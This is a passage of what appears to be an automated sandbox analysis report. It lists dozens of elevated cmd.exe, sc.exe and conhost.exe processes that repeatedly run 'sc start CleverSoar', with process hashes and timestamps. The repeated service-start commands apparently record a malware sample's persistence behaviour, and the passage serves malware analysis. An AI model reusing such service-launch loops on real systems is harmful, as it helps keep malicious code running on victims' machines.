                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:35
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:36
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:41
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:42
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff70f330000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:43
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:44
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:45
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:46
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:47
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:48
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:49
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:50
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:51
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:52
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:53
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:54
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:55
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:56
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:57
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:58
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:59
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:60
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:61
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:62
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:63
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:64
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:65
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:66
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:67
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:68
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:69
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:70
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:71
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:72
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:73
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:74
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:75
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:76
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:77
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:78
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:79
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:80
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:81
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:82
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:83
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:84
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:85
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:86
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:87
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:88
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:89
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:90
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:91
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:92
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:93
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:94
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:95
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:96
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:97
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:98
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:99
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
